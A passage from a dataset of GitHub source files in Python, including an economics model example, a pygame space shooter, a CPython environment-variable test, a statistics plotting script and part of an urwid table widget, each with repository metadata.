bnds=[1e-6, .999],\n activation_fn=tf.nn.relu)\ns = mle.network([K, z, σ], hidden, name='savings', bnds=[1e-6, .999])\n\n# %% ----------- Economic Model -----------------------------\nY = mle.exp(z) * K**ζ * L**(1 - ζ)\nC = (1 - s) * Y\nU = (C**ν * (1 - L)**(1 - ν))**(1 - γ) / (1 - γ)\nI = s * Y\n\n# Dynamics\nK.d = (I - δ * K) * dt\nz.d = -(1 - λ) * z * dt + mle.exp(σ) * dZ[0]\nσ.d = (1 - ρ) * (σ_ - σ) * dt + η * dZ[1]\n\nf = β * θ * J * ((mle.abs(U / J))**(1 / θ) - 1) # Duffie-Epstein aggregator\nHJB = f + J.drift() # Bellman residual\nT = J + Δt * HJB # Bellman target\n\npolicy_eval = mle.fit(J, T)\npolicy_improv = mle.greedy(HJB, actions=[s, L])\n\n# %% ---- # Launch graph ---------------------------------\nmle.launch()\n\n# %% ----------- Create summaries for TensorBoard ----------\n\"\"\" To see the summaries in real time during training open\na terminal and type:\ntensorboard --logdir=./results/summaries\n \"\"\"\nscalars = {'HJB': tf.log(tf.reduce_mean(tf.abs(HJB(0)))),\n 'MSE': tf.log(J.net.loss)}\n\nmle.set_summary(scalars)\n\n\n# %% ----------- Test function -----------------------------\nfeed_dict = {K: np.linspace(1, 10, batch_size),\n z: 0,\n σ: -3}\n\n\ndef test():\n K_, C_, L_ = mle.eval([K, C, L], feed_dict)\n\n plt.subplot(1, 2, 1)\n plt.plot(K_, L_)\n plt.xlabel('K')\n plt.ylabel('L')\n\n plt.subplot(1, 2, 2)\n plt.plot(K_, C_)\n plt.xlabel('K')\n plt.ylabel('C')\n\n plt.show()\n plt.pause(1e-6)\n\n\n# %% ----------- Iteration --------------------------------------\n# mle.load() # Load previous results?\nprogram = {policy_eval: 1,\n policy_improv: 1,\n test: 1000,\n mle.add_summary: 100}\n\nmle.iterate(program, T='01:00:00')\nmle.save()\n","repo_name":"vduarte/MLEcon","sub_path":"examples/DSGE - Caldara et al 2012.py","file_name":"DSGE - Caldara et al 2012.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"29"} +{"seq_id":"3464903484","text":"\"\"\"\"\"\r\n# another space game\r\nimport pygame\r\nimport sys\r\n\r\nscreen_width, screen_height = 800, 800\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\nbackground = pygame.image.load('backgroundSpace_01.1.png')\r\n\r\nclass Spaceship(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('ship5.png')\r\n self.image = pygame.transform.scale(self.image, (90, 110))\r\n\r\n self.rect = self.image.get_rect(center=(screen_width/2, screen_height-200))\r\n\r\n def update(self):\r\n pygame.event.get()\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_UP] and self.rect.y>0:\r\n\r\n self.rect.y-=2\r\n\r\n if keys[pygame.K_DOWN] and self.rect.y<650:\r\n self.rect.y+=2\r\n\r\n if keys[pygame.K_RIGHT] and self.rect.x<700:\r\n\r\n self.rect.x+=2\r\n\r\n if keys[pygame.K_LEFT] and self.rect.x>0:\r\n\r\n self.rect.x-=2\r\n\r\n def create_bullet(self):\r\n\r\n return Enemy_Bullet(self.rect.centerx, self.rect.centery)\r\n\r\n\r\n\r\n\r\n\r\nclass Enemy(pygame.sprite.Sprite):\r\n\r\n def __init__(self):\r\n\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('spiked ship 3. small.blue_.png')\r\n self.image = pygame.transform.scale(self.image, (90, 110))\r\n self.rect = self.image.get_rect(center = (screen_width/2, screen_height-600))\r\n\r\n def update(self):\r\n self.rect.center = pygame.mouse.get_pos()\r\n\r\n def create_bullet(self):\r\n return Spaceship_Bullet(self.rect.centerx+11, self.rect.centery+15 )\r\n #return Spaceship_Bullet(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\r\n\r\n\r\n\r\n\r\nclass Spaceship_Bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image,(30, 50 ))\r\n\r\n self.rect = self.image.get_rect(center= (pos_x, pos_y))\r\n\r\n def update(self):\r\n self.rect.y+=5\r\n\r\n if self.rect.y>800:\r\n self.kill()\r\n\r\nclass Enemy_Bullet(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image, (40, 30))\r\n self.rect = self.image.get_rect(center= (pos_x, pos_y))\r\n\r\n def update(self):\r\n\r\n self.rect.y -= 5\r\n\r\n #if self.rect.y<0:\r\n # self.kill()\r\n\r\n\r\nenemy = Enemy()\r\nenemy_group = pygame.sprite.Group()\r\n\r\n\r\nspaceship = Spaceship()\r\n\r\nspaceship_group = pygame.sprite.Group()\r\nenemy_bullet_group = pygame.sprite.Group()\r\nanother_bullet_group = pygame.sprite.Group()\r\n\r\nspaceship_group.add(spaceship)\r\nenemy_group.add(enemy)\r\n\r\npygame.mouse.set_visible(False)\r\n\r\nkeys = pygame.key.get_pressed()\r\nwhile True:\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n enemy_bullet_group.add(enemy.create_bullet())\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n screen.blit(background, (0, 0))\r\n spaceship_group.draw(screen)\r\n enemy_group.draw(screen)\r\n enemy_bullet_group.draw(screen)\r\n \r\n\r\n\r\n\r\n\r\n spaceship_group.update()\r\n enemy_group.update()\r\n enemy_bullet_group.update()\r\n \r\n\r\n pygame.display.flip()\r\n\"\"\"''\r\n\r\n\r\n\r\nimport pygame, sys, random\r\nfrom pygame import mixer\r\npygame.mixer.pre_init(44100, -16, 2, 512)\r\nmixer.init()\r\n\r\nexplosion_sound = pygame.mixer.Sound('NenadSimic - Muffled Distant Explosion.wav')\r\nlaser_sound = pygame.mixer.Sound('laser1.wav')\r\nlaser_sound_enemy = pygame.mixer.Sound('laser1.wav')\r\n\r\nexplosion_sound.set_volume(5)\r\nlaser_sound.set_volume(0.1)\r\nlaser_sound_enemy.set_volume(0.01)\r\n\r\nred = (255, 0, 0)\r\ngreen = (0, 255, 0)\r\n\r\n# SPACESHIP AND BULLELTS\r\nclass Player(pygame.sprite.Sprite):\r\n\r\n def __init__(self, health):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('DurrrSpaceShip.png')\r\n self.image = pygame.transform.scale(self.image, (50, 30))\r\n\r\n self.rect = self.image.get_rect(center = (screen_width/2 , screen_height/2))\r\n self.health_at_the_beginning = health\r\n self.health_remaining = health\r\n\r\n def update(self):\r\n # movements\r\n self.rect.center = pygame.mouse.get_pos()\r\n\r\n # mask\r\n self.mask = pygame.mask.from_surface(self.image)\r\n\r\n # health_bar\r\n pygame.draw.rect(screen, red, (self.rect.x, (self.rect.bottom + 5), self.rect.width, 15))\r\n\r\n if self.health_remaining > 0:\r\n pygame.draw.rect(screen, green, (self.rect.x, (self.rect.bottom + 5), int(self.rect.width * (self.health_remaining / self.health_at_the_beginning)), 15))\r\n if self.health_remaining <=0:\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n self.kill()\r\n\r\n\r\n def create_bullet(self):\r\n\r\n laser_sound.play()\r\n\r\n\r\n #return Bullets( pygame.mouse.get_pos()[0],pygame.mouse.get_pos()[1] )\r\n return Bullets(self.rect.centerx+11.5, self.rect.centery)\r\n\r\n\r\n\r\nclass Bullets(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image, (40, 30))\r\n self.rect = self.image.get_rect(center=(pos_x, pos_y))\r\n\r\n\r\n\r\n def update(self):\r\n\r\n self.rect.y -= 5\r\n\r\n if self.rect.y <0:\r\n\r\n self.kill()\r\n\r\n if pygame.sprite.spritecollide(self, object_group, True):\r\n self.kill()\r\n explosion_sound.play()\r\n\r\n #explosion_sound.play()\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n\r\n# TARGETS\r\n\r\n\r\nclass Objects(pygame.sprite.Sprite):\r\n\r\n def __init__(self, picture_path, pos_x, pos_y, health):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load(picture_path)\r\n self.image = pygame.transform.scale(self.image, (30, 20))\r\n\r\n self.rect = self.image.get_rect(center = (pos_x, pos_y))\r\n\r\n self.health_at_the_beginning = health\r\n self.health_remaining = health\r\n\r\n def update(self ):\r\n\r\n\r\n self.rect.y += 2\r\n\r\n if self.rect.y>800:\r\n self.rect.y = 0\r\n\r\n if self.rect.x>800:\r\n\r\n self.rect.x = 0\r\n\r\n if self.health_remaining == 0:\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n\r\n self.kill()\r\n\r\n\r\n\r\n\r\n# enemy bullets\r\nclass Enemy_Bullets(pygame.sprite.Sprite):\r\n\r\n def __init__(self, pos_x, pos_y):\r\n super().__init__()\r\n\r\n self.image = pygame.image.load('laserBullet.png')\r\n self.image = pygame.transform.scale(self.image, (30, 20))\r\n self.rect = self.image.get_rect(center=(pos_x, pos_y))\r\n\r\n def update(self):\r\n #laser_sound_enemy.play()\r\n self.rect.y += 10\r\n killing = False\r\n\r\n if self.rect.y > 800:\r\n\r\n self.kill()\r\n\r\n if pygame.sprite.spritecollide(self, player_group, killing):\r\n self.kill()\r\n explosion_sound.play()\r\n player.health_remaining -= 0.1\r\n\r\n animation = Explosion(self.rect.x, self.rect.y)\r\n explosion_group.add(animation)\r\n\r\n\r\nclass Explosion(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y):\r\n super().__init__()\r\n self.explosions = []\r\n\r\n for num in range(1, 3):\r\n\r\n img = pygame.image.load('explo_tiao1_img4.png')\r\n img2 = pygame.image.load('explo_tiao1_img10.png')\r\n\r\n self.explosions.append(img)\r\n self.explosions.append(img2)\r\n\r\n self.index = 0\r\n\r\n self.image = self.explosions[self.index]\r\n self.rect = self.image.get_rect()\r\n self.rect.center = [x, y]\r\n self.counter = 0\r\n\r\n\r\n def update(self):\r\n\r\n explosion_speed = 3\r\n\r\n # updating explosion animation\r\n\r\n self.counter+=1\r\n\r\n if self.counter >= explosion_speed and self.index< len(self.explosions)-1:\r\n\r\n self.counter = 0\r\n self.index+=1\r\n self.image = self.explosions[self.index]\r\n\r\n if self.counter>= explosion_speed and self.index>= len(self.explosions)-1:\r\n self.kill()\r\n\r\n\r\n\r\npygame.init()\r\n\r\n\r\nbullet_group = pygame.sprite.Group()\r\nbullets = Bullets( pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\r\nscreen_width, screen_height = 800, 800\r\n\r\n\r\n\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\n#background = pygame.image.load('space1.png')\r\n\r\n\r\nplayer = Player(3)\r\nplayer_group = pygame.sprite.Group()\r\nplayer_group.add(player)\r\n\r\n#enemy_bullets = pygame.sprite.Group()\r\n\r\n\r\n\r\n#explosion_group = pygame.sprite.Group()\r\n#object_group = pygame.sprite.Group()\r\n\r\n\r\n# enemy spaceships\r\n\r\n\"\"\"\"\"\r\nfor objects in range(3):\r\n\r\n enemy = Objects('DurrrSpaceShipcopy.png', random.randint(0, screen_width),random.randint(0, screen_height), 3)\r\n Giant = Objects('Transforming fighter ship 1_061.png' , random.randint(0, screen_width), random.randint(0, screen_height),3)\r\n giant = Objects('Transforming fighter ship 1_001.png', random.randint(0, screen_width), random.randint(0, screen_width), 3)\r\n giant1 = Objects('Transforming fighter ship 1_027.png', random.randint(0, screen_width), random.randint(0, screen_height),3)\r\n object_group.add(enemy)\r\n object_group.add(Giant)\r\n object_group.add(giant)\r\n object_group.add(giant1)\r\n\"\"\"\"\"\r\n\r\n\r\npygame.mouse.set_visible(False)\r\n\r\n\r\n\r\nframe_rate = pygame.time.Clock()\r\nwhile True:\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n bullet_group.add(player.create_bullet())\r\n \"\"\"\"\"\r\n if True:\r\n\r\n attacking_ship = random.choice(object_group.sprites())\r\n alien_bullet = Enemy_Bullets(attacking_ship.rect.centerx +9, attacking_ship.rect.bottom)\r\n enemy_bullets.add(alien_bullet)\r\n \"\"\"\"\"\r\n screen.blit(background, (0, 0))\r\n\r\n\r\n object_group.draw(screen)\r\n\r\n player_group.draw(screen)\r\n bullet_group.draw(screen)\r\n enemy_bullets.draw(screen)\r\n explosion_group.draw(screen)\r\n\r\n\r\n player_group.update()\r\n bullet_group.update()\r\n object_group.update()\r\n enemy_bullets.update()\r\n explosion_group.update()\r\n\r\n\r\n\r\n frame_rate.tick(200)\r\n pygame.display.flip()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"IlhamulAzam/spacemultiplayergame","sub_path":"game2Project.py","file_name":"game2Project.py","file_ext":"py","file_size_in_byte":10706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72966602318","text":"\"\"\"\nTest suite for OS X interpreter environment variables.\n\"\"\"\nfrom test.support import EnvironmentVarGuard\nimport subprocess\nimport sys\nimport sysconfig\nimport unittest\n\n\n@unittest.skipUnless(sys.platform == 'darwin' and sysconfig.get_config_var(\n 'WITH_NEXT_FRAMEWORK'), 'unnecessary on this platform')\nclass OSXEnvironmentVariableTestCase(unittest.TestCase):\n\n def _check_sys(self, ev, cond, sv, val=sys.executable + 'dummy'):\n with EnvironmentVarGuard() as evg:\n subpc = [str(sys.executable), '-c', \n 'import sys; sys.exit(2 if \"%s\" %s %s else 3)' % (val, cond,\n sv)]\n evg.unset(ev)\n rc = subprocess.call(subpc)\n self.assertEqual(rc, 3, 'expected %s not %s %s' % (ev, cond, sv))\n evg.set(ev, val)\n rc = subprocess.call(subpc)\n self.assertEqual(rc, 2, 'expected %s %s %s' % (ev, cond, sv))\n\n def test_pythonexecutable_sets_sys_executable(self):\n self._check_sys('PYTHONEXECUTABLE', '==', 'sys.executable')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"emilyemorehouse/ast-and-me","sub_path":"code/tmp_rtrip/test/test_osx_env.py","file_name":"test_osx_env.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"29"} +{"seq_id":"73064306959","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 15 19:55:27 2019\r\n\r\n@author: Yudy Andrea Fierro\r\n\"\"\"\r\n#Ejercicio 4\r\n\r\nlist_b = []\r\n\r\nsum_pos = 0\r\n\r\nb = int(input('Ingrese un número entero positivo: '))\r\n\r\n'''Desgloso el número digito a digito y lo almaceno en una lista''' \r\nwhile b > 0:\r\n list_b.append(b%10)\r\n b//=10\r\n\r\n'''Se verifica que el digito sea par y se hace la respectiva sumatoria'''\r\nfor i in list_b :\r\n if i%2 == 0:\r\n sum_pos += i\r\n \r\nif sum_pos == 0:\r\n print('No hay números pares')\r\n \r\nelse:\r\n print('La suma de los números pares es: ',sum_pos)","repo_name":"yudyandrea/114562_FierroYudy","sub_path":"Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10535923631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 1 08:51:02 2022\n\n@author: TimMonko\n\"\"\"\n\n#%% Import and Wrangle Data\nimport os\nimport pandas as pd\nimport glob\nimport numpy as np\n\nfile_directory = r\"C:\\Users\\TimMonko\\Documents\\GitHub\\BastianLab\\WorkingPython\\AxonMitoMotility_TM 2\\A\"\nos.chdir(file_directory)\n\nfile_type = \"*.csv\"\nfilenames = glob.glob(file_type)\n\ndata_list = []\nfor file in filenames:\n val_name = file[:len(file) - 4]\n raw_data = pd.read_csv(file)\n melt_data = (raw_data\n .melt(value_name = val_name, var_name = 'Tx')\n .set_index('Tx'))\n data_list.append(melt_data)\n\ndata = pd.concat(data_list, axis = 1, ignore_index = False).dropna(axis = 0).reset_index()\ndata = data.assign(Log = lambda data: np.log(data['Average Speed (per Mito)']))\ndata = data.assign(Log2 = lambda data: np.log(data['Percent Time Moving']))\n\ndata = data.assign(Per = lambda data: data['Percent Time Moving'] / 100)\ndata_describe = data.groupby(\"Tx\").describe()\n\n#%% Pinguoin Stats\n# https://pingouin-stats.org/index.html\n# https://pingouin-stats.org/guidelines.html\nimport pingouin as pg\n\ndef dv_tests(df, dv, iv):\n norm = pg.normality(data = df, dv = dv, group = iv) # Normal distriubtion of population assumed true in ANOVA/T\n \n hs = pg.homoscedasticity(data = df, dv = dv, group = iv) # Homogeneity of Variances (ANOVA/T assumption is true)\n\n lr = pg.anova(data = df, dv = dv, between = iv)\n print(dv + ' x ' + iv, norm, hs, lr, sep = '\\n')\n \nfor dvs in data.columns[data.columns != 'Tx']:\n dv_tests(data, dvs, 'Tx')\n\n# mitoc density, retro velocity, perc time retro motion, perc pausing, perc time moving, perc time anterograde motion \n\n#%% Seaborn Settings for Plotting\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom statannotations.Annotator import Annotator # https://github.com/trevismd/statannotations\n#statsannotations for the future https://levelup.gitconnected.com/statistics-on-seaborn-plots-with-statannotations-2bfce0394c00\n\n# must explicitely invoke set_them else uses matplotlib defaults. Overrides all matplotlib based plots\nsns.set_theme(style = \"darkgrid\", context = \"notebook\", palette = \"colorblind\") \n\n#%% Discrete plotting\n\ndef box_swarm_plot(x, y, data, ylabel):\n ax = sns.boxplot(x = x, y = y, data = data,\n width = 0.6, palette = 'pastel')\n\n ax = sns.swarmplot(x = x , y = y, data = data,\n edgecolor = 'gray', linewidth = None)\n\n ax.set_xlabel(None)\n ax.set_ylabel(ylabel)\n annotator = Annotator(ax, pairs = [(\"IS\", \"ID\")], data = data, x = x, y = y)\n annotator.configure(test = 'Mann-Whitney', text_format = 'star', loc = 'inside')\n annotator.apply_and_annotate()\n return ax\n\nplots = []\n\nfor dvs in data.columns[data.columns != 'Tx']:\n plot = box_swarm_plot('Tx', dvs, data, dvs)\n plt.show()\n plots.append(plot)\n\n# plots[0].figure.savefig('box.svg') # to call from list\n\n#%% PairGrid relationship plot\n#quick and dirty, but caution on amount of variables\n\npp = sns.pairplot(data, hue = \"Tx\", kind = 'reg') # default is scatter\n\n#%% Residual plotting to test for linearity of data\na = sns.residplot(x = 'Log', y = 'Percent Time Moving', data = data)\n\n#%%\n\nr = sns.lmplot(\n x = 'Average Speed (per Mito)',\n y = 'Per',\n data = data,\n hue = 'Tx',\n logistic = True)\n#%% Seaborn Relational Plotting\n\n\nr = sns.lmplot(\n x = 'Pause Frequency (per Mito)', \n y = 'Log', \n hue = 'Tx', \n data = data)\n\nr = sns.lmplot(\n x = 'Average Speed (per Mito)', \n y = 'Percent Time Moving', \n hue = 'Tx', \n data = data,\n logx = True)\n\nr = sns.lmplot(\n x = 'Log', \n y = 'Percent Time Moving', \n hue = 'Tx', \n data = data)\n\nr = sns.lmplot(\n x = 'Log', \n y = 'Log2', \n hue = 'Tx', \n data = data,\n robust = True)\n\nr = sns.lmplot(\n x = 'Average_Branch_Length', \n y = 'Num_Branches', \n hue = 'Tx', \n data = data)\n\nr.legend.set_title(\"Treatment\")\n#r.set_xlabels(\"Avg. Branch Length\")\n#r.set_ylabels(\"Num. Branches\")\n\nplt.show()\nr.figure.savefig('LmPlot.svg')\n#%% Kde plot\n\nj = sns.jointplot(\n data = data,\n x = 'Average Speed (per Mito)',\n y = 'Percent Time Moving',\n hue = 'Tx')\n\nj = sns.jointplot(\n data = data,\n x = 'Average Speed (per Mito)',\n y = 'Percent Time Moving',\n hue = 'Tx',\n kind = \"kde\")\n\n#%% Tidy Data statsmodels stats \n# R like syntax, much more robust, but more complex \n# https://www.statsmodels.org/stable/gettingstarted.html\n# Consider the importance of bounded data (i.e. percents) when modeling https://stats.stackexchange.com/questions/103731/what-are-the-issues-with-using-percentage-outcome-in-linear-regression\n\n\n\nimport statsmodels.api as sm \nfrom statsmodels.formula.api import ols\n\n# OLS model -- a \"complicated\" look at ANOVA stats, C() forces categorical\nmodel = ols('Q(\"Average Speed (per Mito)\") ~ Q(\"Percent Time Moving\") * C(Tx)', data = data).fit()\nmodel = ols('Total_Branch_Length ~ Num_Branches * C(Tx)', data = data).fit()\nmodel = ols('Num_Branches ~ Average_Branch_Length * C(Tx)', data = data).fit()\n\n#print(model.summary()) # very overwhelming output\n# So, push the model through the ANOVA to simplify the output \nanova_table = sm.stats.anova_lm(model, typ = 2)\nanova_table\n\n# Outliers with statsmodels\n#test = model.outlier_test()\n#outliers_test = test[test['bonf(p)'] < 0.05]\n\n\n\n\n","repo_name":"TimMonko/BastianLab","sub_path":"PythonProjects/AxonMitoMotility_TM 2/A/Old_AxonMito_Data_from_TB.py","file_name":"Old_AxonMito_Data_from_TB.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18083270008","text":"from .Tables import Table\n\n\nclass Measure(Table):\n def __init__(self, table_name: str, db_name: str) -> None:\n super().__init__(table_name, db_name)\n\n def create_table(self) -> None:\n self.db.create_connection()\n query = (\n f\"CREATE TABLE IF NOT EXISTS {self.table_name}s (\"\n f\"{self.table_name}_id INTEGER PRIMARY KEY, {self.table_name}_name TEXT UNIQUE);\"\n )\n self.db.execute_query(query)\n self.db.connection.commit()\n","repo_name":"EliasCarvalho20/JBA-Python-Projects","sub_path":"Medium/Food Blog Backend/Food Blog Backend/task/tables/Measure.py","file_name":"Measure.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22944608499","text":"\nimport logging\nlogger = logging.getLogger(\"urwid_datatable\")\nimport urwid\nfrom urwid_utils.palette import *\nfrom .listbox import ScrollingListBox\nfrom orderedattrdict import OrderedDict\nimport itertools\nimport traceback\nfrom datetime import datetime, date as datetype\nimport math\nfrom blist import blist\n\nfrom .dataframe import *\nfrom .rows import *\n\nclass NoSuchColumnException(Exception):\n pass\n\ndef make_value_function(template):\n\n def inner(table, row):\n return template.format(\n row=table.index_to_position(\n row.get(table.index)\n )+1,\n rows_loaded = len(table),\n rows_total = table.query_result_count()\n )\n\n return inner\n\n\nclass DataTableColumn(object):\n\n def __init__(self, name,\n label=None,\n value=None,\n width=('weight', 1),\n align=\"left\", wrap=\"space\",\n padding = DEFAULT_CELL_PADDING, #margin=1,\n hide=False,\n format_fn=None,\n format_record = None, # format_fn is passed full row data\n attr = None,\n sort_key = None, sort_reverse=False,\n sort_icon = None,\n footer_fn = None, footer_arg = \"values\"):\n\n self.name = name\n self.label = label if label is not None else name\n if value:\n if isinstance(value, str):\n self.value_fn = make_value_function(value)\n elif callable(value):\n self.value_fn = value\n else:\n self.value_fn = None\n self.width = width\n self.align = align\n self.wrap = wrap\n self.padding = padding\n self.hide = hide\n self.format_fn = format_fn\n self.format_record = format_record\n self.attr = attr\n self.sort_key = sort_key\n self.sort_reverse = sort_reverse\n self.sort_icon = sort_icon\n self.footer_fn = footer_fn\n self.footer_arg = footer_arg\n\n if isinstance(self.width, tuple):\n if self.width[0] != \"weight\":\n raise Exception(\n \"Column width %s not supported\" %(col.width[0])\n )\n self.sizing, self.width = self.width\n elif isinstance(width, int):\n self.sizing = \"given\"\n else:\n self.sizing = width\n\n\n def width_with_padding(self, table_padding=None):\n padding = 0\n if self.padding is None and table_padding is not None:\n padding = table_padding\n return self.width + 2*padding\n\n\n def _format(self, v):\n\n # First, call the format function for the column, if there is one\n if self.format_fn:\n try:\n v = self.format_fn(v)\n except Exception as e:\n logger.error(\"%s format exception: %s\" %(self.name, v))\n logger.exception(e)\n raise e\n return self.format(v)\n\n\n def format(self, v):\n\n # Do our best to make the value into something presentable\n if v is None:\n v = \"\"\n elif isinstance(v, int):\n v = \"%d\" %(v)\n elif isinstance(v, float):\n v = \"%.03f\" %(v)\n elif isinstance(v, datetime):\n v = v.strftime(\"%Y-%m-%d %H:%M:%S\")\n elif isinstance(v, datetype):\n v = v.strftime(\"%Y-%m-%d\")\n if not isinstance(v, urwid.Widget):\n v = urwid.Text(v, align=self.align, wrap=self.wrap)\n return v\n\n\nclass DataTable(urwid.WidgetWrap, urwid.listbox.ListWalker):\n\n\n signals = [\"select\", \"refresh\",\n # \"focus\", \"unfocus\", \"row_focus\", \"row_unfocus\",\n \"drag_start\", \"drag_continue\", \"drag_stop\"]\n\n ATTR = \"table\"\n\n columns = []\n\n limit = None\n index = \"index\"\n\n with_header = True\n with_footer = False\n with_scrollbar = False\n\n sort_by = (None, None)\n query_sort = False\n sort_icons = True\n sort_refocus = False\n\n border = DEFAULT_TABLE_BORDER\n padding = DEFAULT_CELL_PADDING\n\n ui_sort = True\n\n attr_map = {}\n focus_map = {}\n highlight_map = {}\n highlight_focus_map = {}\n\n detail_fn = None\n detail_column = None\n auto_expand_details = False\n\n def __init__(self,\n columns = None,\n limit=None,\n index=None,\n with_header=None, with_footer=None, with_scrollbar=None,\n sort_by=None, query_sort=None, sort_icons=None,\n sort_refocus=None,\n border=None, padding=None,\n detail_fn = None, detail_column = None,\n auto_expand_details = False,\n ui_sort=None):\n\n self._focus = 0\n if columns is not None: self.columns = columns\n if index: self.index = index\n\n if not self.index in self.column_names:\n self.columns.insert(\n 0,\n DataTableColumn(self.index, hide=True)\n )\n\n if query_sort: self.query_sort = query_sort\n\n if sort_by:\n if isinstance(sort_by, tuple):\n column = sort_by[0]\n reverse = sort_by[1]\n else:\n column = sort_by\n reverse = None\n self.sort_by = (column, reverse)\n\n self.sort_by = (column, reverse)\n\n self.initial_sort = self.sort_by\n\n if sort_icons is not None: self.sort_icons = sort_icons\n if sort_refocus is not None: self.sort_refocus = sort_refocus\n\n if with_header is not None: self.with_header = with_header\n if with_footer is not None: self.with_footer = with_footer\n if with_scrollbar is not None: self.with_scrollbar = with_scrollbar\n\n if border is not None: self.border = border\n if padding is not None: self.padding = padding\n\n if ui_sort is not None: self.ui_sort = ui_sort\n\n if detail_fn is not None: self.detail_fn = detail_fn\n if detail_column is not None: self.detail_column = detail_column\n if auto_expand_details: self.auto_expand_details = auto_expand_details\n\n # self.offset = 0\n if limit:\n self.limit = limit\n\n self.sort_column = None\n\n self.filters = None\n self.filtered_rows = blist()\n\n logger.debug(\"columns: %s\" %(self.column_names))\n\n kwargs = dict(\n columns = self.column_names,\n use_blist=True,\n sort=False,\n # sorted=True,\n )\n if self.index:\n kwargs[\"index_name\"] = self.index\n\n self.df = DataTableDataFrame(**kwargs)\n\n\n self.pile = urwid.Pile([])\n self.listbox = ScrollingListBox(\n self, infinite=self.limit,\n with_scrollbar = self.with_scrollbar,\n row_count_fn = self.row_count\n )\n\n urwid.connect_signal(\n self.listbox, \"select\",\n lambda source, selection: urwid.signals.emit_signal(\n self, \"select\", self, self.get_dataframe_row(selection.index))\n )\n urwid.connect_signal(\n self.listbox, \"drag_start\",\n lambda source, drag_from: urwid.signals.emit_signal(\n self, \"drag_start\", self, drag_from)\n )\n urwid.connect_signal(\n self.listbox, \"drag_continue\",\n lambda source, drag_from, drag_to: urwid.signals.emit_signal(\n self, \"drag_continue\", self, drag_from, drag_to)\n )\n urwid.connect_signal(\n self.listbox, \"drag_stop\",\n lambda source, drag_from ,drag_to: urwid.signals.emit_signal(\n self, \"drag_stop\", self, drag_from, drag_to)\n )\n\n if self.limit:\n urwid.connect_signal(self.listbox, \"load_more\", self.load_more)\n # self.offset = 0\n\n if self.with_header:\n self.header = DataTableHeaderRow(\n self,\n border = self.border,\n padding = self.padding,\n )\n\n self.pile.contents.insert(0,\n (self.header, self.pile.options('pack'))\n )\n\n if self.ui_sort:\n urwid.connect_signal(\n self.header, \"column_click\",\n lambda index: self.sort_by_column(index, toggle=True)\n )\n\n self.pile.contents.append(\n (self.listbox, self.pile.options('weight', 1))\n )\n self.pile.focus_position = len(self.pile.contents)-1\n\n if self.with_footer:\n self.footer = DataTableFooterRow(\n self,\n border = self.border,\n padding = self.padding\n )\n self.pile.contents.append(\n (self.footer, self.pile.options('pack'))\n )\n\n\n self.reset()\n\n if self.sort_by:\n self.sort_by_column(self.sort_by)\n\n\n self.attr = urwid.AttrMap(\n self.pile,\n attr_map = self.attr_map,\n # focus_map = self.focus_map\n )\n super(DataTable, self).__init__(self.attr)\n\n\n def query(self, sort=None, offset=None):\n raise Exception(\"query method must be overriden\")\n\n def query_result_count(self):\n raise Exception(\"query_result_count method must be defined\")\n\n @classmethod\n def get_palette_entries(\n cls,\n user_entries={},\n min_contrast_entries = None,\n min_contrast = 2.0,\n default_background=\"black\"\n ):\n\n\n foreground_map = {\n \"table_row_body\": [ \"light gray\", \"light gray\" ],\n \"table_row_header\": [ \"light gray\", \"white\" ],\n \"table_row_footer\": [ \"light gray\", \"white\" ],\n }\n\n background_map = {\n None: [ \"black\", \"black\" ],\n \"focused\": [ \"dark gray\", \"g15\" ],\n \"highlight\": [\"light gray\", \"g15\"],\n \"highlight focused\": [\"light gray\", 